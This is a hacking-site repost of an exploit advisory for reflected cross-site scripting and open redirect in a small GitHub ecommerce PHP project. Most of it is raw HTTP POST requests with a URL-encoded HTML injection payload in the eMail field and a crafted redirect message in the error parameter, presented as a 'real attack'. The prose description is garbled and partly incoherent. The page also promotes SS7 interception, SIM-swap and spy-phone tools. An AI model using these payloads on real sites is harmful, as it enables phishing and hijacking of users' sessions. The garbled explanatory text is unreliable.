• Advertise
  • SS7 Hacking
Friday, January 27, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Secure Web Gateway 10.2.11 Cross Site Scripting

    Inout Jobs Portal 2.2.2 Cross Site Scripting

    Inout Jobs Portal 2.2.2 SQL Injection

    Inout Music 5.1.1 SQL Injection

    Cacti 1.2.22 Command injection

    Inout Search Engine 10.1.3 Cross Site scripting

    Inout Homestay 2.2 SQL Injection

    Active eCommerce CMS 6.5.0 Cross Site Scripting

    ERPGo SaaS 3.9 CSV Injection

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

    Brave Browser turns your device into a proxy for others via “Snowflake” Feature

    This tool, “telerwaf”, protects go apps from web-based attacks

    Microsoft Patch Tuesday, January 20,23 with 98 Bug Fixes

    Multiple bug fixes released by Qualcomm and Lenovo

    Fortinet Patched Multiple Vulnerabilities In FortiADC And FortiTester

  • Hacking Tools
    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Monitor Docker containers metrics and other events

    Management of vulnerability with Wazuh Open Source XDR

    Seven Tips for Building a Banking App That is User-Friendly

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials
    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Monitor Docker containers metrics and other events

    CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

    CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

    Management of vulnerability with Wazuh Open Source XDR

  • Kali Linux

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    ADFSRelay – Proof of Concept Utilities Developed For Researching NTLM Relaying Attacks Targeting ADFS

    Azure Sentinel protects Kubernetes deployments

    Reconator Automated Recon For Pentesting and Bug Bounty

    Kali Linux (is!) Everywhere

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    New Python Malware Targeting Windows Devices

    New Python Malware Targeting Windows Devices

    Blank Image Attack: Blank Images Used to Evade Anti-Malware Checks

    Blank Image Attack: Blank Images Used to Evade Anti-Malware Checks

    Ticketmaster: Taylor Swift ticket sales disrupted by bot-driven attack

    Ticketmaster: Taylor Swift ticket sales disrupted by bot-driven attack

    U.S. Sues Google for Dominance Over Digital Advertising Technologies

    U.S. Sues Google for Dominance Over Digital Advertising Technologies

    New Wave of Cyberattacks Targeting MS Exchange Servers

    New Wave of Cyberattacks Targeting MS Exchange Servers

    GoTo’s LastPass Breach: Encrypted Customer Data Taken

    GoTo’s LastPass Breach: Encrypted Customer Data Taken

    Top FinTech API Security Challenges

    Top FinTech API Security Challenges

    Micorosft down – Xbox Azure, MS365, and MS Teams

    Wireshark 4.0.3 is now available – What’s new?

  • Advertise
  • Home
  • Exploits

    Secure Web Gateway 10.2.11 Cross Site Scripting

    Inout Jobs Portal 2.2.2 Cross Site Scripting

    Inout Jobs Portal 2.2.2 SQL Injection

    Inout Music 5.1.1 SQL Injection

    Cacti 1.2.22 Command injection

    Inout Search Engine 10.1.3 Cross Site scripting

    Inout Homestay 2.2 SQL Injection

    Active eCommerce CMS 6.5.0 Cross Site Scripting

    ERPGo SaaS 3.9 CSV Injection

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

    Brave Browser turns your device into a proxy for others via “Snowflake” Feature

    This tool, “telerwaf”, protects go apps from web-based attacks

    Microsoft Patch Tuesday, January 20,23 with 98 Bug Fixes

    Multiple bug fixes released by Qualcomm and Lenovo

    Fortinet Patched Multiple Vulnerabilities In FortiADC And FortiTester

  • Hacking Tools
    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Monitor Docker containers metrics and other events

    Management of vulnerability with Wazuh Open Source XDR

    Seven Tips for Building a Banking App That is User-Friendly

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials
    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Monitor Docker containers metrics and other events

    CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

    CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

    Management of vulnerability with Wazuh Open Source XDR

  • Kali Linux

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    ADFSRelay – Proof of Concept Utilities Developed For Researching NTLM Relaying Attacks Targeting ADFS

    Azure Sentinel protects Kubernetes deployments

    Reconator Automated Recon For Pentesting and Bug Bounty

    Kali Linux (is!) Everywhere

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    New Python Malware Targeting Windows Devices

    New Python Malware Targeting Windows Devices

    Blank Image Attack: Blank Images Used to Evade Anti-Malware Checks

    Blank Image Attack: Blank Images Used to Evade Anti-Malware Checks

    Ticketmaster: Taylor Swift ticket sales disrupted by bot-driven attack

    Ticketmaster: Taylor Swift ticket sales disrupted by bot-driven attack

    U.S. Sues Google for Dominance Over Digital Advertising Technologies

    U.S. Sues Google for Dominance Over Digital Advertising Technologies

    New Wave of Cyberattacks Targeting MS Exchange Servers

    New Wave of Cyberattacks Targeting MS Exchange Servers

    GoTo’s LastPass Breach: Encrypted Customer Data Taken

    GoTo’s LastPass Breach: Encrypted Customer Data Taken

    Top FinTech API Security Challenges

    Top FinTech API Security Challenges

    Micorosft down – Xbox Azure, MS365, and MS Teams

    Wireshark 4.0.3 is now available – What’s new?

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

Ecommerce 1.0 Cross Site scripting/Open Redirect

by Ineedhack
December 1, 2022
in Exploits
0
79
SHARES
493
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials – JavaScript Injection
## Author: nu11secur1ty

## Date: 11.23.2022

## Vendor: https://github.com/winston-dsouza

## Software: https://github.com/winston-dsouza/ecommerce-website

## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website

## Description:

Copy the value of the eMail Request Parameter into the value

An HTML tag attribute that is enclosed in double quotation marks.

This system is very simple to hack into and can be used by an attacker to trick users.

Very dangerous link, from any location. Then the game is over.

These customers.

By using botnet computers, an attacker could also create a network.

This vulnerability.

## STATUS: HIGH Vulnerability

[+] Exploit00:

“`POST

POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com

HTTP/1.1

Host: pwnedhost.com

Accept-Encoding: gzip, deflate

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107

Safari/537.36

Connectivity: Close

Cache-Control: max-age=0

Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f

Origin: http://pwnedhost.com

Upgrade-Insecure-Requests: 1

Referer: http://pwnedhost.com/ecommerce/index.php

Content-Type: application/x-www-form-urlencoded

Sec-CH-UA: “.Not/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″

Sec-CHUA-Platform for Windows

Sec-CH-UA-Mobile: ?0

Content-Length: 0

“`

## Description01:

JavaScript is possible to be embedded into an application response, making it vulnerable

app – signup_script.php, no sanitizing submit function).

An attacker could crash MySQL servers by sending POST large chunks.

This system will accept requests from the MySQL server.

CRITICAL ## STATUS: HIGH Vulnerability

## Real attack:

[+] Exploit01:

“`POST

POST /ecommerce/signup_script.php HTTP/1.1

Host: pwnedhost.com

Accept-Encoding: gzip, deflate

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107

Safari/537.36

Connectivity: Close

Cache-Control: max-age=0

Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f

Origin: http://pwnedhost.com

Upgrade-Insecure-Requests: 1

Referer: http://pwnedhost.com/ecommerce/index.php

Content-Type: application/x-www-form-urlencoded

Sec-CH-UA: “.Not/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″

Sec-CHUA-Platform for Windows

Sec-CH-UA-Mobile: ?0

Content-Length: 1070

eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ

“`

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)

## Evidence and Exploit

[href](https://streamable.com/3r4t36)

## Real Exploit:

[href](https://streamable.com/n3b5ev)

## Real Exploit – code insert:

[href](https://streamable.com/64dmo2)

## Time spent

`1:45`

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

F5 BIGIP iControl Remote Command Execution

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

Online Food Ordering System 2.0 SQL Injection

2 weeks ago

Kali Linux again in AWS Cloud

6 years ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise